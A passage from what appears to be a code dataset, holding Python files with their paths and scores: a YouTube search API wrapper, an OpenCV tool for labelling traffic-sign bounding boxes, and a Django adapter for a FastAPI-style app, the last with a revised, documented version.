encoded_types = self.type_encoder(batched_labels)
return network_output, encoded_types | 0.897505 | 0.466785 |
from typing import Literal
from ..resources.SearchResultResources import SearchListResponse
from googleapiclient.discovery import Resource
class Search:
def __init__(self, client: Resource) -> None:
self.client: Resource = client
# That's a lot of parameters!
# With the amount of params this has, and the fact that I don't have a proper testing mechanism
# and the fact that this uses a _lot_ of quota per call and I have the free tier of quota
# means that a lot of the params here isn't gonna be tested. So yeah...
def list(self, *, q: str = None,
for_content_owner: bool = None, for_developer: bool = None, for_mine: bool = None, related_to_video_id: str = None,
order: Literal['date', 'rating', 'relevance', 'title', 'videoCount', 'viewCount'] = None,
safe_search: Literal['none', 'moderate', 'strict'] = None,
type: Literal['channel', 'playlist', 'video'] = None, topic_id: str = None,
published_after: str = None, published_before: str = None,
region_code: str = None, relevance_language: str = None,
location: str = None, location_radius: str = None,
channel_id: str = None, channel_type: Literal['show'] = None, event_type: Literal['completed', 'live', 'upcoming'] = None,
video_caption: Literal['closedCaption', 'none'] = None, video_category_id: str = None,
video_definition: Literal['high', 'standard'] = None,
video_dimension: Literal['2d', '3d'] = None,
video_duration: Literal['long', 'medium', 'short'] = None,
video_embeddable: Literal['true'] = None, video_license: Literal['creativeCommon', 'youtube'] = None,
video_syndicated: Literal['true'] = None, video_type: Literal['episode', 'movie'] = None,
max_results: int = None, page_token: str = None, on_behalf_of_content_owner: str = None
):
"""
Returns a collection of search results that match the query parameters specified in the API request.
"""
res = self.client.search().list(
part='snippet',
forContentOwner=for_content_owner, forDeveloper=for_developer, forMine=for_mine, relatedToVideoId=related_to_video_id,
channelId=channel_id, channelType=channel_type, eventType=event_type,
location=location, locationRadius=location_radius, maxResults=max_results,
onBehalfOfContentOwner=on_behalf_of_content_owner, order=order, pageToken=page_token,
publishedAfter=published_after, publishedBefore=published_before, q=q,
regionCode=region_code, relevanceLanguage=relevance_language, safeSearch=safe_search,
topicId=topic_id, type=type,
videoCaption=video_caption, videoCategoryId=video_category_id, videoDefinition=video_definition,
videoDimension=video_dimension, videoDuration=video_duration, videoEmbeddable=video_embeddable,
videoLicense=video_license, videoSyndicated=video_syndicated, videoType=video_type
).execute()
return SearchListResponse._from_response_dict(res) | src/ytwrapper/apis/Searches.py | from typing import Literal
from ..resources.SearchResultResources import SearchListResponse
from googleapiclient.discovery import Resource
class Search:
def __init__(self, client: Resource) -> None:
self.client: Resource = client
# That's a lot of parameters!
# With the amount of params this has, and the fact that I don't have a proper testing mechanism
# and the fact that this uses a _lot_ of quota per call and I have the free tier of quota
# means that a lot of the params here isn't gonna be tested. So yeah...
def list(self, *, q: str = None,
for_content_owner: bool = None, for_developer: bool = None, for_mine: bool = None, related_to_video_id: str = None,
order: Literal['date', 'rating', 'relevance', 'title', 'videoCount', 'viewCount'] = None,
safe_search: Literal['none', 'moderate', 'strict'] = None,
type: Literal['channel', 'playlist', 'video'] = None, topic_id: str = None,
published_after: str = None, published_before: str = None,
region_code: str = None, relevance_language: str = None,
location: str = None, location_radius: str = None,
channel_id: str = None, channel_type: Literal['show'] = None, event_type: Literal['completed', 'live', 'upcoming'] = None,
video_caption: Literal['closedCaption', 'none'] = None, video_category_id: str = None,
video_definition: Literal['high', 'standard'] = None,
video_dimension: Literal['2d', '3d'] = None,
video_duration: Literal['long', 'medium', 'short'] = None,
video_embeddable: Literal['true'] = None, video_license: Literal['creativeCommon', 'youtube'] = None,
video_syndicated: Literal['true'] = None, video_type: Literal['episode', 'movie'] = None,
max_results: int = None, page_token: str = None, on_behalf_of_content_owner: str = None
):
"""
Returns a collection of search results that match the query parameters specified in the API request.
"""
res = self.client.search().list(
part='snippet',
forContentOwner=for_content_owner, forDeveloper=for_developer, forMine=for_mine, relatedToVideoId=related_to_video_id,
channelId=channel_id, channelType=channel_type, eventType=event_type,
location=location, locationRadius=location_radius, maxResults=max_results,
onBehalfOfContentOwner=on_behalf_of_content_owner, order=order, pageToken=page_token,
publishedAfter=published_after, publishedBefore=published_before, q=q,
regionCode=region_code, relevanceLanguage=relevance_language, safeSearch=safe_search,
topicId=topic_id, type=type,
videoCaption=video_caption, videoCategoryId=video_category_id, videoDefinition=video_definition,
videoDimension=video_dimension, videoDuration=video_duration, videoEmbeddable=video_embeddable,
videoLicense=video_license, videoSyndicated=video_syndicated, videoType=video_type
).execute()
return SearchListResponse._from_response_dict(res) | 0.562657 | 0.194215 |
from imutils.video import FPS
import imutils
import os
import cv2
import shutil
import time
import show_option_trafic_sign
import define
def on_pos_video_trackbar(val):
global vs, frame_index
if val != frame_index:
frame_index = val
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
print("Set Pos : ", val)
# function called by trackbar, sets the speed of playback
def setSpeed(val):
global playSpeed
playSpeed = max(val, 1)
def mouse_callback(event, x, y, flags, param):
global mouse_down
global step
if event == cv2.EVENT_LBUTTONDOWN:
if mouse_down is False:
mouse_down = True
step = 0
else:
step += 1
elif event == cv2.EVENT_LBUTTONUP and mouse_down:
mouse_down = False
main_title_window = "Video"
frame_index = 0
playSpeed = 250
mouse_down = False
step = 0
path_video = define.path_video
path_save_data = define.path_save_data
name_video = define.name_video
vs = cv2.VideoCapture(path_video)
if vs.isOpened() is False:
print("Open video false")
exit()
num_of_frame = int(vs.get(cv2.CAP_PROP_FRAME_COUNT))
pos_slider_max = num_of_frame
cv2.namedWindow(main_title_window, cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback(main_title_window, mouse_callback)
cv2.createTrackbar('Position', main_title_window, 0, pos_slider_max, on_pos_video_trackbar)
cv2.createTrackbar("Speed", "Video", playSpeed, 500, setSpeed)
def main():
global frame_index
global step
# Initial tracker video
tracker_type = "csrt" # csrt
OPENCV_OBJECT_TRACKERS = {
"csrt": cv2.TrackerCSRT_create, # higher object tracking accuracy and can tolerate slower FPS throughput
"kcf": cv2.TrackerKCF_create, # faster FPS throughput but can handle slightly lower object tracking accuracy
"boosting": cv2.TrackerBoosting_create,
"mil": cv2.TrackerMIL_create,
"tld": cv2.TrackerTLD_create,
"medianflow": cv2.TrackerMedianFlow_create,
"mosse": cv2.TrackerMOSSE_create
}
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
# initialize the bounding box coordinates of the object we are going
# to track
initBB = None
fps = None
start = True
view_left = False
view_right = False
# loop for choice view left or right
ret, frame_ori = vs.read()
print("Please press r(R) to view right window or e(E) to view left side window!")
while start:
view_frame = imutils.resize(frame_ori, width=1000)
text = 'Please press r(R) to view right window or e(E) to view left side window!'
(H, W) = view_frame.shape[:2]
cv2.putText(view_frame, text, (10, H - 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("e") or key == ord("E"):
folder_image = path_save_data + '/image_left/'
folder_label = path_save_data + '/label_left/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_left = True
elif key == ord("r") or key == ord("R"):
folder_image = path_save_data + '/image_right/'
folder_label = path_save_data + '/label_right/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_right = True
# loop over frames from the video stream
while True:
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, frame_ori = vs.read()
(H_ori, W_ori) = frame_ori.shape[:2]
if view_left:
x_max_show = 1850
y_max_show = 900
x_min_show = 0
y_min_show = 0
frame = frame_ori[:int(H_ori), :int(W_ori / 2)]
elif view_right:
x_max_show = 3800
y_max_show = 900
x_min_show = 1920
y_min_show = 0
frame = frame_ori[:int(H_ori), int(W_ori / 2):]
view_frame = frame_ori[y_min_show:y_max_show, x_min_show:x_max_show]
frame_index += 1
cv2.setTrackbarPos('Position', main_title_window, frame_index)
if mouse_down:
step += 1
# check to see if we have reached the end of the stream
if frame is None:
break
(H, W) = frame.shape[:2]
# check to see if we are currently tracking an object
if initBB is not None:
# grab the new bounding box coordinates of the object
(success, box) = tracker.update(frame)
if success:
(x, y, w, h) = [int(v) for v in box]
if (x + w) > 1900 or x < 5 or y > 900 or y < 0:
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
else:
cv2.rectangle(frame, (x, y), (x + w, y + h),
(0, 255, 0), 2)
print('tracking success! x, y, w, h = ', x, y, w, h)
# format (class_id xcen ycen w h)
x_cen = x + (w / 2)
y_cen = y + (h / 2)
boding_box_label = str(show_option_trafic_sign.class_id) + ' ' + str(x_cen / W) + ' ' + str(
y_cen / H) + ' ' + str(
w / W) + ' ' + str(h / H) + '\n'
label_file = os.path.join(folder_label, name_video + "." + str(frame_index) + ".txt")
image_file = os.path.join(folder_image, name_video + "." + str(frame_index) + ".jpg")
'''check file existed create new file for new object'''
while os.path.exists(label_file) and os.path.exists(image_file):
label_file = label_file.split('.')[0] + "_obj"
image_file = image_file.split('.')[0] + "_obj"
label_file = label_file + "." + str(frame_index) + ".txt"
image_file = image_file + "." + str(frame_index) + ".jpg"
f_label_image_write = open(label_file, 'w')
f_label_image_write.write(boding_box_label)
cv2.imwrite(image_file, frame)
fps.update()
fps.stop()
info = [
("Tracker", tracker_type),
("Success", "Yes" if success else "No"),
("FPS", "{:.2f}".format(fps.fps())),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
# show the output frame
# H, W 1080 3840
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("d") or key == ord("D"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
elif key == ord("s") or key == ord("S"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
while initBB is None:
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
initBB = cv2.selectROI(main_title_window, frame, fromCenter=False,
showCrosshair=True)
if sum(initBB) == 0:
initBB = None
continue
# start OpenCV object tracker using the supplied bounding box
# coordinates, then start the FPS throughput estimator as well
while show_option_trafic_sign.class_id is None:
show_option_trafic_sign.label_window()
tracker.init(frame, initBB)
fps = FPS().start()
elif key == ord("c") or key == ord("C"):
path_image_cp = folder_image + '_cp_' + str(frame_index) + '/'
path_label_cp = folder_image + '_cp_' + str(frame_index) + '/'
shutil.copytree(folder_image, path_image_cp)
shutil.copytree(folder_label, path_label_cp)
elif key == ord("h") or key == ord("H"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
(H, W) = view_frame_help.shape[:2]
info = [
("Press q or Q", "to quit program"),
("Press h or H", "view help"),
("Press c or C", "copy image data current to another folder"),
("Press g or G", "decrease 2 frame (Don't press while tracking)"),
("Press f or F", "increase 2 frame (Don't press while tracking)"),
("Press d or D", "delete bounding box of the object"),
("Press s or S", "select the bounding box of the object we want to track"),
("Press h or H", "to quit help"),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(view_frame_help, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("h") or key == ord("H"):
break
elif key == ord("f") or key == ord("F"):
if frame_index > 2:
frame_index -= 4
print('frame_index', frame_index)
elif key == ord("g") or key == ord("G"):
if frame_index < num_of_frame:
frame_index += 4
print('frame_index', frame_index)
elif key == ord("p") or key == ord("P"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(0) & 0xFF
if key == ord("p") or key == ord("P"):
break
time.sleep(1)
elif key == ord("q") or key == ord("Q"):
break
vs.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
'47400' | tracking_object_v0.1.py | from imutils.video import FPS
import imutils
import os
import cv2
import shutil
import time
import show_option_trafic_sign
import define
def on_pos_video_trackbar(val):
global vs, frame_index
if val != frame_index:
frame_index = val
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
print("Set Pos : ", val)
# function called by trackbar, sets the speed of playback
def setSpeed(val):
global playSpeed
playSpeed = max(val, 1)
def mouse_callback(event, x, y, flags, param):
global mouse_down
global step
if event == cv2.EVENT_LBUTTONDOWN:
if mouse_down is False:
mouse_down = True
step = 0
else:
step += 1
elif event == cv2.EVENT_LBUTTONUP and mouse_down:
mouse_down = False
main_title_window = "Video"
frame_index = 0
playSpeed = 250
mouse_down = False
step = 0
path_video = define.path_video
path_save_data = define.path_save_data
name_video = define.name_video
vs = cv2.VideoCapture(path_video)
if vs.isOpened() is False:
print("Open video false")
exit()
num_of_frame = int(vs.get(cv2.CAP_PROP_FRAME_COUNT))
pos_slider_max = num_of_frame
cv2.namedWindow(main_title_window, cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback(main_title_window, mouse_callback)
cv2.createTrackbar('Position', main_title_window, 0, pos_slider_max, on_pos_video_trackbar)
cv2.createTrackbar("Speed", "Video", playSpeed, 500, setSpeed)
def main():
global frame_index
global step
# Initial tracker video
tracker_type = "csrt" # csrt
OPENCV_OBJECT_TRACKERS = {
"csrt": cv2.TrackerCSRT_create, # higher object tracking accuracy and can tolerate slower FPS throughput
"kcf": cv2.TrackerKCF_create, # faster FPS throughput but can handle slightly lower object tracking accuracy
"boosting": cv2.TrackerBoosting_create,
"mil": cv2.TrackerMIL_create,
"tld": cv2.TrackerTLD_create,
"medianflow": cv2.TrackerMedianFlow_create,
"mosse": cv2.TrackerMOSSE_create
}
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
# initialize the bounding box coordinates of the object we are going
# to track
initBB = None
fps = None
start = True
view_left = False
view_right = False
# loop for choice view left or right
ret, frame_ori = vs.read()
print("Please press r(R) to view right window or e(E) to view left side window!")
while start:
view_frame = imutils.resize(frame_ori, width=1000)
text = 'Please press r(R) to view right window or e(E) to view left side window!'
(H, W) = view_frame.shape[:2]
cv2.putText(view_frame, text, (10, H - 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("e") or key == ord("E"):
folder_image = path_save_data + '/image_left/'
folder_label = path_save_data + '/label_left/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_left = True
elif key == ord("r") or key == ord("R"):
folder_image = path_save_data + '/image_right/'
folder_label = path_save_data + '/label_right/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_right = True
# loop over frames from the video stream
while True:
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, frame_ori = vs.read()
(H_ori, W_ori) = frame_ori.shape[:2]
if view_left:
x_max_show = 1850
y_max_show = 900
x_min_show = 0
y_min_show = 0
frame = frame_ori[:int(H_ori), :int(W_ori / 2)]
elif view_right:
x_max_show = 3800
y_max_show = 900
x_min_show = 1920
y_min_show = 0
frame = frame_ori[:int(H_ori), int(W_ori / 2):]
view_frame = frame_ori[y_min_show:y_max_show, x_min_show:x_max_show]
frame_index += 1
cv2.setTrackbarPos('Position', main_title_window, frame_index)
if mouse_down:
step += 1
# check to see if we have reached the end of the stream
if frame is None:
break
(H, W) = frame.shape[:2]
# check to see if we are currently tracking an object
if initBB is not None:
# grab the new bounding box coordinates of the object
(success, box) = tracker.update(frame)
if success:
(x, y, w, h) = [int(v) for v in box]
if (x + w) > 1900 or x < 5 or y > 900 or y < 0:
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
else:
cv2.rectangle(frame, (x, y), (x + w, y + h),
(0, 255, 0), 2)
print('tracking success! x, y, w, h = ', x, y, w, h)
# format (class_id xcen ycen w h)
x_cen = x + (w / 2)
y_cen = y + (h / 2)
boding_box_label = str(show_option_trafic_sign.class_id) + ' ' + str(x_cen / W) + ' ' + str(
y_cen / H) + ' ' + str(
w / W) + ' ' + str(h / H) + '\n'
label_file = os.path.join(folder_label, name_video + "." + str(frame_index) + ".txt")
image_file = os.path.join(folder_image, name_video + "." + str(frame_index) + ".jpg")
'''check file existed create new file for new object'''
while os.path.exists(label_file) and os.path.exists(image_file):
label_file = label_file.split('.')[0] + "_obj"
image_file = image_file.split('.')[0] + "_obj"
label_file = label_file + "." + str(frame_index) + ".txt"
image_file = image_file + "." + str(frame_index) + ".jpg"
f_label_image_write = open(label_file, 'w')
f_label_image_write.write(boding_box_label)
cv2.imwrite(image_file, frame)
fps.update()
fps.stop()
info = [
("Tracker", tracker_type),
("Success", "Yes" if success else "No"),
("FPS", "{:.2f}".format(fps.fps())),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(frame, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
# show the output frame
# H, W 1080 3840
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("d") or key == ord("D"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
elif key == ord("s") or key == ord("S"):
initBB = None
show_option_trafic_sign.class_id = None
tracker.clear()
while initBB is None:
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
initBB = cv2.selectROI(main_title_window, frame, fromCenter=False,
showCrosshair=True)
if sum(initBB) == 0:
initBB = None
continue
# start OpenCV object tracker using the supplied bounding box
# coordinates, then start the FPS throughput estimator as well
while show_option_trafic_sign.class_id is None:
show_option_trafic_sign.label_window()
tracker.init(frame, initBB)
fps = FPS().start()
elif key == ord("c") or key == ord("C"):
path_image_cp = folder_image + '_cp_' + str(frame_index) + '/'
path_label_cp = folder_image + '_cp_' + str(frame_index) + '/'
shutil.copytree(folder_image, path_image_cp)
shutil.copytree(folder_label, path_label_cp)
elif key == ord("h") or key == ord("H"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
(H, W) = view_frame_help.shape[:2]
info = [
("Press q or Q", "to quit program"),
("Press h or H", "view help"),
("Press c or C", "copy image data current to another folder"),
("Press g or G", "decrease 2 frame (Don't press while tracking)"),
("Press f or F", "increase 2 frame (Don't press while tracking)"),
("Press d or D", "delete bounding box of the object"),
("Press s or S", "select the bounding box of the object we want to track"),
("Press h or H", "to quit help"),
]
# loop over the info tuples and draw them on our frame
for (i, (k, v)) in enumerate(info):
text = "{}: {}".format(k, v)
cv2.putText(view_frame_help, text, (10, H - ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("h") or key == ord("H"):
break
elif key == ord("f") or key == ord("F"):
if frame_index > 2:
frame_index -= 4
print('frame_index', frame_index)
elif key == ord("g") or key == ord("G"):
if frame_index < num_of_frame:
frame_index += 4
print('frame_index', frame_index)
elif key == ord("p") or key == ord("P"):
while True:
view_frame_help = imutils.resize(frame, width=1000)
cv2.imshow(main_title_window, view_frame_help)
key = cv2.waitKey(0) & 0xFF
if key == ord("p") or key == ord("P"):
break
time.sleep(1)
elif key == ord("q") or key == ord("Q"):
break
vs.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
'47400' | 0.366363 | 0.223854 |
from typing import Any, Callable, Coroutine, Dict, List, Optional, Sequence, Type, Union
from django.urls import re_path
from django.views.decorators.csrf import csrf_exempt
from django.http import Http404, HttpResponseNotAllowed
from .fastapi import FastAPI
from .fastapi.params import Depends
from .fastapi.exceptions import HTTPException
from .fastapi.datastructures import Default
from .base import HTMLResponse, Request, Response, JSONResponse
from .route import BaseRoute
import logging
_logger = logging.getLogger(__name__)
RAPIDOC_PAGE_TPL = """
<!doctype html> <!-- Important: must specify -->
<html>
<head>
<title>{title} - RapiDoc</title>
<meta charset="utf-8"> <!-- Important: rapi-doc uses utf8 charecters -->
<script type="module" src="https://unpkg.com/rapidoc/dist/rapidoc-min.js"></script>
</head>
<body>
<rapi-doc
spec-url="{openapi_url}"
sort-endpoints-by="method"
render-style="read"
> </rapi-doc>
</body>
</html>
"""
class OpenAPI(FastAPI):
def __init__(
self,
*,
debug: bool = False,
routes: Optional[List[BaseRoute]] = None,
title: str = "Django mini FastAPI",
description: str = "",
version: str = "0.1.0",
openapi_url: Optional[str] = "/openapi.json",
openapi_tags: Optional[List[Dict[str, Any]]] = None,
servers: Optional[List[Dict[str, Union[str, Any]]]] = None,
dependencies: Optional[Sequence[Depends]] = None,
default_response_class: Type[Response] = Default(JSONResponse),
docs_url: Optional[str] = "/docs",
redoc_url: Optional[str] = "/redoc",
rapidoc_url: Optional[str] = "/rapidoc",
swagger_ui_oauth2_redirect_url: Optional[str] = "/docs/oauth2-redirect",
swagger_ui_init_oauth: Optional[Dict[str, Any]] = None,
exception_handlers: Optional[
Dict[
Union[int, Type[Exception]],
Callable[[Request, Any], Coroutine[Any, Any, Response]],
]
] = None,
terms_of_service: Optional[str] = None,
contact: Optional[Dict[str, Union[str, Any]]] = None,
license_info: Optional[Dict[str, Union[str, Any]]] = None,
root_path: str = "",
root_path_in_servers: bool = True,
responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None,
callbacks: Optional[List[BaseRoute]] = None,
deprecated: Optional[bool] = None,
include_in_schema: bool = True,
**extra: Any
) -> None:
super().__init__(
debug=debug,
routes=routes,
title=title,
description=description,
version=version,
openapi_url=openapi_url,
openapi_tags=openapi_tags,
servers=servers,
dependencies=dependencies,
default_response_class=default_response_class,
docs_url=docs_url,
redoc_url=redoc_url,
swagger_ui_oauth2_redirect_url=swagger_ui_oauth2_redirect_url,
swagger_ui_init_oauth=swagger_ui_init_oauth,
exception_handlers=exception_handlers,
terms_of_service=terms_of_service,
contact=contact,
license_info=license_info,
root_path=root_path,
root_path_in_servers=root_path_in_servers,
responses=responses,
callbacks=callbacks,
deprecated=deprecated,
include_in_schema=include_in_schema,
**extra
)
self.rapidoc_url = rapidoc_url
if self.openapi_url and self.rapidoc_url:
def rapi_doc_html(req: Request) -> HTMLResponse:
root_path = self.root_path.rstrip("/")
openapi_url = root_path + self.openapi_url
return HTMLResponse(
RAPIDOC_PAGE_TPL.format(title=self.title, openapi_url=openapi_url)
)
self.add_route(self.rapidoc_url, rapi_doc_html, include_in_schema=False)
def as_django_url_pattern(self):
return re_path(
"^{prefix_path}/(?P<route_path>.*)".format(
prefix_path=self.root_path.strip("/")
),
self.as_django_view(),
)
def as_django_view(self):
@csrf_exempt
def dispatcher(request: Request, route_path: str):
route_path = self.root_path + "/" + route_path.strip("/")
matched_route = None
matched_route_path_kwargs = None
method_not_allowed_routes: List[BaseRoute] = []
try:
for route in self.router.routes:
path_kwargs: Optional[Dict[str, str]] = route.match_path(route_path)
# path regex not matched
if path_kwargs is None:
continue
# found 1st full matched route, break here
if route.check_method_allowed(request.method):
matched_route = route
matched_route_path_kwargs = path_kwargs
break
else:
method_not_allowed_routes.append(route)
else:
# no break after scanned all routes
if method_not_allowed_routes:
raise HTTPException(405)
else:
raise HTTPException(404)
request.path_kwargs = matched_route_path_kwargs
return matched_route(request)
except Exception as e:
exc_handler = self.exception_handlers.get(type(e))
if exc_handler:
return exc_handler(request, e)
raise e
return dispatcher
def add_exception_handler(self, exc_cls: Type[Exception], fn: Callable):
self.exception_handlers[exc_cls] = fn
def exception_handler(self, exc_cls: Type[Exception]) -> Callable:
def _decorated(fn: Callable) -> Callable:
self.add_exception_handler(exc_cls=exc_cls, fn=fn)
return _decorated | django_mini_fastapi/api.py | from typing import Any, Callable, Coroutine, Dict, List, Optional, Sequence, Type, Union
from django.urls import re_path
from django.views.decorators.csrf import csrf_exempt
from django.http import Http404, HttpResponseNotAllowed
from .fastapi import FastAPI
from .fastapi.params import Depends
from .fastapi.exceptions import HTTPException
from .fastapi.datastructures import Default
from .base import HTMLResponse, Request, Response, JSONResponse
from .route import BaseRoute
import logging
_logger = logging.getLogger(__name__)
RAPIDOC_PAGE_TPL = """
<!doctype html> <!-- Important: must specify -->
<html>
<head>
<title>{title} - RapiDoc</title>
<meta charset="utf-8"> <!-- Important: rapi-doc uses utf8 charecters -->
<script type="module" src="https://unpkg.com/rapidoc/dist/rapidoc-min.js"></script>
</head>
<body>
<rapi-doc
spec-url="{openapi_url}"
sort-endpoints-by="method"
render-style="read"
> </rapi-doc>
</body>
</html>
"""
class OpenAPI(FastAPI):
    """FastAPI application adapted to run inside Django.

    On top of the vendored :class:`FastAPI` it adds an optional RapiDoc
    documentation page (``rapidoc_url``) and two adapters,
    :meth:`as_django_url_pattern` and :meth:`as_django_view`, which mount
    the whole API under a single Django URL pattern.
    """

    def __init__(
        self,
        *,
        debug: bool = False,
        routes: Optional[List[BaseRoute]] = None,
        title: str = "Django mini FastAPI",
        description: str = "",
        version: str = "0.1.0",
        openapi_url: Optional[str] = "/openapi.json",
        openapi_tags: Optional[List[Dict[str, Any]]] = None,
        servers: Optional[List[Dict[str, Union[str, Any]]]] = None,
        dependencies: Optional[Sequence[Depends]] = None,
        default_response_class: Type[Response] = Default(JSONResponse),
        docs_url: Optional[str] = "/docs",
        redoc_url: Optional[str] = "/redoc",
        rapidoc_url: Optional[str] = "/rapidoc",
        swagger_ui_oauth2_redirect_url: Optional[str] = "/docs/oauth2-redirect",
        swagger_ui_init_oauth: Optional[Dict[str, Any]] = None,
        exception_handlers: Optional[
            Dict[
                Union[int, Type[Exception]],
                Callable[[Request, Any], Coroutine[Any, Any, Response]],
            ]
        ] = None,
        terms_of_service: Optional[str] = None,
        contact: Optional[Dict[str, Union[str, Any]]] = None,
        license_info: Optional[Dict[str, Union[str, Any]]] = None,
        root_path: str = "",
        root_path_in_servers: bool = True,
        responses: Optional[Dict[Union[int, str], Dict[str, Any]]] = None,
        callbacks: Optional[List[BaseRoute]] = None,
        deprecated: Optional[bool] = None,
        include_in_schema: bool = True,
        **extra: Any
    ) -> None:
        # Everything except ``rapidoc_url`` is forwarded verbatim to FastAPI.
        super().__init__(
            debug=debug,
            routes=routes,
            title=title,
            description=description,
            version=version,
            openapi_url=openapi_url,
            openapi_tags=openapi_tags,
            servers=servers,
            dependencies=dependencies,
            default_response_class=default_response_class,
            docs_url=docs_url,
            redoc_url=redoc_url,
            swagger_ui_oauth2_redirect_url=swagger_ui_oauth2_redirect_url,
            swagger_ui_init_oauth=swagger_ui_init_oauth,
            exception_handlers=exception_handlers,
            terms_of_service=terms_of_service,
            contact=contact,
            license_info=license_info,
            root_path=root_path,
            root_path_in_servers=root_path_in_servers,
            responses=responses,
            callbacks=callbacks,
            deprecated=deprecated,
            include_in_schema=include_in_schema,
            **extra
        )
        self.rapidoc_url = rapidoc_url
        if self.openapi_url and self.rapidoc_url:
            # Serve the RapiDoc UI only when there is a schema to point it at.
            def rapi_doc_html(req: Request) -> HTMLResponse:
                root_path = self.root_path.rstrip("/")
                openapi_url = root_path + self.openapi_url
                return HTMLResponse(
                    RAPIDOC_PAGE_TPL.format(title=self.title, openapi_url=openapi_url)
                )

            self.add_route(self.rapidoc_url, rapi_doc_html, include_in_schema=False)

    def as_django_url_pattern(self):
        """Return a Django ``re_path`` forwarding everything under
        ``root_path`` to this application's dispatcher view."""
        return re_path(
            "^{prefix_path}/(?P<route_path>.*)".format(
                prefix_path=self.root_path.strip("/")
            ),
            self.as_django_view(),
        )

    def as_django_view(self):
        """Build the CSRF-exempt Django view that routes requests.

        Matching: the first route whose path regex matches *and* allows the
        request method wins; a path match with a disallowed method yields
        405, no path match at all yields 404.  Escaping exceptions are
        looked up in ``self.exception_handlers`` by exact type.
        """

        @csrf_exempt
        def dispatcher(request: Request, route_path: str):
            route_path = self.root_path + "/" + route_path.strip("/")
            matched_route = None
            matched_route_path_kwargs = None
            method_not_allowed_routes: List[BaseRoute] = []
            try:
                for route in self.router.routes:
                    path_kwargs: Optional[Dict[str, str]] = route.match_path(route_path)
                    # path regex not matched
                    if path_kwargs is None:
                        continue
                    # found 1st full matched route, break here
                    if route.check_method_allowed(request.method):
                        matched_route = route
                        matched_route_path_kwargs = path_kwargs
                        break
                    else:
                        method_not_allowed_routes.append(route)
                else:
                    # no break after scanning all routes
                    if method_not_allowed_routes:
                        raise HTTPException(405)
                    else:
                        raise HTTPException(404)

                request.path_kwargs = matched_route_path_kwargs
                return matched_route(request)
            except Exception as e:
                exc_handler = self.exception_handlers.get(type(e))
                if exc_handler:
                    return exc_handler(request, e)
                raise e

        return dispatcher

    def add_exception_handler(self, exc_cls: Type[Exception], fn: Callable):
        """Register *fn* for exceptions of exactly type *exc_cls*
        (dispatcher lookup is by ``type(e)``, not isinstance)."""
        self.exception_handlers[exc_cls] = fn

    def exception_handler(self, exc_cls: Type[Exception]) -> Callable:
        """Decorator form of :meth:`add_exception_handler`."""

        def _decorated(fn: Callable) -> Callable:
            self.add_exception_handler(exc_cls=exc_cls, fn=fn)
            # Bug fix: return the wrapped function so the decorated name is
            # not rebound to None.
            return fn

        return _decorated
from urlparse import urlparse
import json
import urllib
import urllib2
import requests
from vilya.config import DOMAIN
from vilya.models.pull import PullRequest
